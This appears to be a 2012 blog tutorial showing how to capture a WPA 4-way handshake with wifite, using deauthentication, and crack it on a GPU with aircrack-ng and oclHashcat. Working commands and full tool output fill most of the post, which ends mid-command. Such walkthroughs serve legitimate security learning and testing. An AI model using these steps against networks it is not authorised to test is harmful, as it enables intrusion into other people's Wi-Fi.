{"id":504,"date":"2012-03-24T16:45:01","date_gmt":"2012-03-24T16:45:01","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=504"},"modified":"2012-03-24T16:45:01","modified_gmt":"2012-03-24T16:45:01","slug":"cracking-wpa-4way-handshakes-with-your-gpu","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/03\/24\/cracking-wpa-4way-handshakes-with-your-gpu\/","title":{"rendered":"Cracking WPA 4way handshakes with your GPU!"},"content":{"rendered":"<p>We need to capture the WPA 4-way handshake in order to perform an offline GPU attack. For this demo we&#8217;ll be using an <a href=\"http:\/\/www.rfshop.co.uk\/active-wireless\/awus036h-alfa-awus036h-awuso36h-wireless-usb-adaptor-with-rp-sma-jack.html\" target=\"_blank\">Alfa AWUS036H wireless card<\/a> under <a href=\"http:\/\/www.backtrack-linux.org\/downloads\/\" target=\"_blank\">Backtrack 5 R2 64bit<\/a>.<\/p>\n<p><a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/wifite.png\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/wifite-150x150.png\" alt=\"\" title=\"wifite\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-491\" \/><\/a><br \/>\nNow I could go in depth about capturing the WPA handshake manually using aircrack-ng, but it has been <a href=\"http:\/\/aircrack-ng.org\/doku.php?id=cracking_wpa\" target=\"_blank\">covered in full<\/a> in many places already, so instead I&#8217;m going to use a great Python tool called <a href=\"http:\/\/code.google.com\/p\/wifite\/\" target=\"_blank\">wifite<\/a> that automates the cracking process (it also supports automated WEP cracking using many types of attacks).<br \/>\nTo download it, it&#8217;s a simple case of using <em>wget<\/em> \ud83d\ude42<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br 
\/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw3\">cd<\/span> <span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"sy0\">\/<\/span><br \/>\n<span class=\"kw2\">wget<\/span> <span class=\"re5\">-O<\/span> wifite.py http:<span class=\"sy0\">\/\/<\/span>wifite.googlecode.com<span class=\"sy0\">\/<\/span>svn<span class=\"sy0\">\/<\/span>trunk<span class=\"sy0\">\/<\/span>wifite.py<br \/>\n<span class=\"kw2\">chmod<\/span> +x wifite.py<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Wifite supports both command-line and GUI-based control; to be honest, the command-line interface is so good that I&#8217;ve never bothered with the GUI, so here we&#8217;ll use the CLI.<br \/>\nThe following command tells wifite to target only the SSID &#8220;DLINK&#8221; and to attempt WPA-based attacks; as we&#8217;re not supplying a dictionary, only the handshake will be captured and no automated cracking with pyrit will be attempted.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"co0\"># .\/wifite.py -e &quot;DLINK&quot; --no-wep --no-strip<\/span><br \/>\n&nbsp; .;<span class=\"st_h\">' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; `;, &nbsp; &nbsp;<br \/>\n&nbsp;.;'<\/span> &nbsp;,;<span class=\"st_h\">' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; `;, &nbsp;`;, &nbsp; WiFite r84<br \/>\n.;'<\/span> &nbsp;,;<span 
class=\"st_h\">' &nbsp;,;'<\/span> &nbsp; &nbsp; <span class=\"sy0\">`<\/span>;, &nbsp;<span class=\"sy0\">`<\/span>;, &nbsp;<span class=\"sy0\">`<\/span>;, &nbsp;<br \/>\n:: &nbsp; :: &nbsp; : &nbsp; <span class=\"br0\">&#40;<\/span> <span class=\"br0\">&#41;<\/span> &nbsp; : &nbsp; :: &nbsp; :: &nbsp;mass WEP<span class=\"sy0\">\/<\/span>WPA cracker<br \/>\n<span class=\"st_h\">':. &nbsp;'<\/span>:. &nbsp;<span class=\"st_h\">':. \/_\\ ,:'<\/span> &nbsp;,:<span class=\"st_h\">' &nbsp;,:'<\/span> &nbsp;<br \/>\n&nbsp;<span class=\"st_h\">':. &nbsp;'<\/span>:. &nbsp; &nbsp;<span class=\"sy0\">\/<\/span>___\\ &nbsp; &nbsp;,:<span class=\"st_h\">' &nbsp;,:'<\/span> &nbsp; designed <span class=\"kw1\">for<\/span> backtrack4<br \/>\n&nbsp; <span class=\"st_h\">':. &nbsp; &nbsp; &nbsp; \/_____\\ &nbsp; &nbsp; &nbsp;,:'<\/span> &nbsp; &nbsp; <br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"sy0\">\/<\/span> &nbsp; &nbsp; &nbsp; \\ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> only scanning <span class=\"kw1\">for<\/span> WPA-encrypted networks<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> wpa handshake stripping disabled<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> searching <span class=\"kw1\">for<\/span> devices <span class=\"kw1\">in<\/span> monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">!<\/span><span class=\"br0\">&#93;<\/span> no wireless interfaces are <span class=\"kw1\">in<\/span> monitor mode<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">select<\/span> <span class=\"kw2\">which<\/span> device you want to put into monitor mode:<br \/>\n&nbsp; &nbsp; &nbsp; <span class=\"nu0\">1<\/span>. 
wlan0&nbsp; &nbsp; &nbsp; Realtek RTL8187L&nbsp; &nbsp; rtl8187 - <span class=\"br0\">&#91;<\/span>phy1<span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">select<\/span> the wifi interface <span class=\"br0\">&#40;<\/span>between <span class=\"nu0\">1<\/span> and <span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span>: <span class=\"nu0\">1<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> putting <span class=\"st0\">&quot;wlan0&quot;<\/span> into monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> searching <span class=\"kw1\">for<\/span> devices <span class=\"kw1\">in<\/span> monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> defaulting to interface <span class=\"st0\">&quot;mon0&quot;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> waiting <span class=\"kw1\">for<\/span> <span class=\"st0\">&quot;DLINK&quot;<\/span> to appear, press Ctrl+C to skip... &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> found <span class=\"st0\">&quot;DLINK&quot;<\/span>, waiting <span class=\"nu0\">1<\/span> sec <span class=\"kw1\">for<\/span> clients... 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">in<\/span> order to crack WPA, you will need to enter a dictionary <span class=\"kw2\">file<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> enter the path to the dictionary to use, or <span class=\"st0\">&quot;none&quot;<\/span> to not crack at all:<br \/>\nnone<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> estimated maximum <span class=\"kw3\">wait<\/span> <span class=\"kw1\">time<\/span> is 05 minutes<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> attacking <span class=\"st0\">&quot;DLINK&quot;<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:05:00<span class=\"br0\">&#93;<\/span> starting wpa handshake capture<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:04:<span class=\"nu0\">54<\/span><span class=\"br0\">&#93;<\/span> added new client: <span class=\"nu0\">60<\/span>:C5:<span class=\"nu0\">47<\/span>:<span class=\"nu0\">72<\/span>:A5:<span class=\"nu0\">75<\/span>, total: <span class=\"nu0\">1<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:04:<span class=\"nu0\">51<\/span><span class=\"br0\">&#93;<\/span> sent <span class=\"nu0\">3<\/span> deauth packets; handshake captured<span class=\"sy0\">!<\/span> saved <span class=\"kw2\">as<\/span> <span class=\"st0\">&quot;hs\/DLINK.cap&quot;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> attack is complete: <span class=\"nu0\">1<\/span> handshake,<br \/>\nroot<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Successful \ud83d\ude42 So the part we are interested in here is the 
DLINK.cap file. Confirm you have the handshake inside the capture file using the following command:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:~<span class=\"sy0\">\/<\/span>Desktop<span class=\"co0\"># aircrack-ng DLINK.cap <\/span><br \/>\nOpening DLINK.cap<br \/>\nRead <span class=\"nu0\">1971<\/span> packets.<br \/>\n&nbsp; &nbsp;<span class=\"co0\"># &nbsp;BSSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ESSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Encryption<\/span><br \/>\n&nbsp; &nbsp;<span class=\"nu0\">1<\/span> &nbsp;1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE &nbsp;DLINK &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WPA <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span> handshake<span class=\"br0\">&#41;<\/span><br \/>\nChoosing first network <span class=\"kw2\">as<\/span> target.<br \/>\nOpening DLINK.wifite.cap<br \/>\nPlease specify a dictionary <span class=\"br0\">&#40;<\/span>option -w<span class=\"br0\">&#41;<\/span>.<br \/>\nQuitting aircrack-ng...<br \/>\nroot<span class=\"sy0\">@<\/span>bt:~<span class=\"sy0\">\/<\/span>Desktop<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>So you&#8217;ve gone to all the effort to capture the 4way handshake but you want to try and crack it using your GPU instead of using rainbow tables. Using the same 4way handshake from this post we will attempt to crack it using Hashcat.<\/p>\n<p>First of all we need to convert the pcap file into one that hashcat can understand, aircrack v1.1 can do this and it comes preinstalled in BT5r2. 
(Note: BT5r1 uses an older version that doesn&#8217;t allow creation of hccap files)<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/><\/div><\/td><td><div class=\"bash codecolorer\">aircrack-ng DLINK.cap <span class=\"re5\">-J<\/span> DLINK<br \/>\nOpening DLINK.cap<br \/>\nRead <span class=\"nu0\">1971<\/span> packets.<br \/>\n&nbsp; &nbsp;<span class=\"co0\"># &nbsp;BSSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ESSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Encryption<\/span><br \/>\n&nbsp; &nbsp;<span class=\"nu0\">1<\/span> &nbsp;1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE &nbsp;DLINK &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WPA <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span> handshake<span class=\"br0\">&#41;<\/span><br \/>\nChoosing first network <span class=\"kw2\">as<\/span> target.<br \/>\nOpening DLINK.wifite.cap<br \/>\nReading packets, please wait...<br \/>\nBuilding Hashcat <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1.00<\/span><span class=\"br0\">&#41;<\/span> file...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> ESSID <span class=\"br0\">&#40;<\/span>length: <span class=\"nu0\">5<\/span><span class=\"br0\">&#41;<\/span>: DLINK<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Key version: <span class=\"nu0\">2<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span 
class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> BSSID: 1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> STA: <span class=\"nu0\">60<\/span>:C5:<span class=\"nu0\">47<\/span>:<span class=\"nu0\">72<\/span>:A5:<span class=\"nu0\">75<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> anonce:<br \/>\n&nbsp; &nbsp; CF <span class=\"nu0\">50<\/span> 01 03 B5 <span class=\"nu0\">73<\/span> 08 B2 6A C2 AB 2C 07 DA <span class=\"nu0\">72<\/span> <span class=\"nu0\">52<\/span> <br \/>\n&nbsp; &nbsp; 0A C3 <span class=\"nu0\">21<\/span> <span class=\"nu0\">60<\/span> D2 C6 DE 5F 05 <span class=\"nu0\">93<\/span> 8D 08 D0 08 9A <span class=\"nu0\">46<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> snonce:<br \/>\n&nbsp; &nbsp; <span class=\"nu0\">55<\/span> <span class=\"nu0\">41<\/span> AB EA <span class=\"nu0\">41<\/span> 5F F5 02 AF D2 02 D7 D2 <span class=\"nu0\">84<\/span> 6B D8 <br \/>\n&nbsp; &nbsp; <span class=\"nu0\">42<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">27<\/span> <span class=\"nu0\">79<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">96<\/span> <span class=\"nu0\">43<\/span> 4F <span class=\"nu0\">34<\/span> F7 4F 7E 08 <span class=\"nu0\">17<\/span> <span class=\"nu0\">40<\/span> BA <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Key MIC:<br \/>\n&nbsp; &nbsp; 0D FA B1 7E <span class=\"nu0\">28<\/span> BE 07 <span class=\"nu0\">15<\/span> <span class=\"nu0\">86<\/span> <span class=\"nu0\">37<\/span> 3D 9F 2D <span class=\"nu0\">12<\/span> A0 <span class=\"nu0\">18<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> eapol:<br \/>\n&nbsp; &nbsp; 02 03 00 <span 
class=\"nu0\">75<\/span> 02 01 0A 00 <span class=\"nu0\">10<\/span> 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 01 <span class=\"nu0\">55<\/span> <span class=\"nu0\">41<\/span> AB EA <span class=\"nu0\">41<\/span> 5F F5 02 AF D2 02 D7 D2 <span class=\"nu0\">84<\/span> 6B <br \/>\n&nbsp; &nbsp; D8 <span class=\"nu0\">42<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">27<\/span> <span class=\"nu0\">79<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">96<\/span> <span class=\"nu0\">43<\/span> 4F <span class=\"nu0\">34<\/span> F7 4F 7E 08 <span class=\"nu0\">17<\/span> <span class=\"nu0\">40<\/span> <br \/>\n&nbsp; &nbsp; BA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 <span class=\"nu0\">16<\/span> <span class=\"nu0\">30<\/span> <span class=\"nu0\">14<\/span> 01 00 00 0F AC 02 01 00 00 0F AC <br \/>\n&nbsp; &nbsp; 04 01 00 00 0F AC 02 0C 00 <br \/>\nSuccessfully written to DLINK.hccap<br \/>\nQuitting aircrack-ng...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now it&#8217;s just a simple case of importing the new hccap file into hashcat. 
We&#8217;ll start off with a dictionary demo:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap darkc0de.lst <br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nRules: <span class=\"nu0\">1<\/span><br \/>\nGPU-Loops: <span class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br \/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nScanning dictionary darkc0de.lst: <span class=\"nu0\">1047587<\/span> bytes <span class=\"br0\">&#40;<\/span><span class=\"nu0\">5.83<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span>, <span class=\"nu0\">95782<\/span> words,<br \/>\nScanned dictionary darkc0de.lst: 
<span class=\"nu0\">17975873<\/span> bytes, <span class=\"nu0\">1707659<\/span> words, <span class=\"nu0\">1707633<\/span> keyspace,<br \/>\nstarting attack...<br \/>\nDLINK:mysecret<br \/>\nStatus.......: Cracked<br \/>\nInput.Mode...: File <span class=\"br0\">&#40;<\/span>darkc0de.lst<span class=\"br0\">&#41;<\/span><br \/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">13<\/span> secs<br \/>\nTime.Util....: 13198.3ms<span class=\"sy0\">\/<\/span>189.8ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.5<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">67528<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">67776<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">1507780<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1707633<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">88.30<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">616522<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1507780<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">40.89<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">89<\/span><span class=\"sy0\">%<\/span> GPU, 56c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">46<\/span>:<span class=\"nu0\">36<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span 
class=\"nu0\">46<\/span>:<span class=\"nu0\">49<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And now a brute-force demo using an 8-character lowercase password:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-a<\/span> <span class=\"nu0\">3<\/span> <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap ?l?l?l?l?l?l?l?l<br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nGPU-Loops: <span class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br \/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nStatus.......: Aborted<br \/>\nInput.Mode...: Mask <span class=\"br0\">&#40;<\/span>?l?l?l?l?l?l?l?l<span class=\"br0\">&#41;<\/span><br 
\/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">6<\/span> secs<br \/>\nTime.Left....: <span class=\"nu0\">36<\/span> days, <span class=\"nu0\">14<\/span> hours<br \/>\nTime.Util....: 6108.4ms<span class=\"sy0\">\/<\/span>87.0ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.4<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">66385<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">74004<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">405504<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">208827064576<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">405504<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">90<\/span><span class=\"sy0\">%<\/span> GPU, 58c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">40<\/span>:<span class=\"nu0\">25<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">40<\/span>:<span class=\"nu0\">31<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Ouch, that&#8217;s going to take ages, 36 days, no thanks! 
To save time in testing I&#8217;ve limited the character set to c, e, m, r, s, t &#038; y, as we know the password already and I don&#8217;t like the sound of leaving it running that long and burning out my GPU!<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-a<\/span> <span class=\"nu0\">3<\/span> <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap <span class=\"re5\">-1<\/span> cemrsty ?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span><br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nGPU-Loops: <span 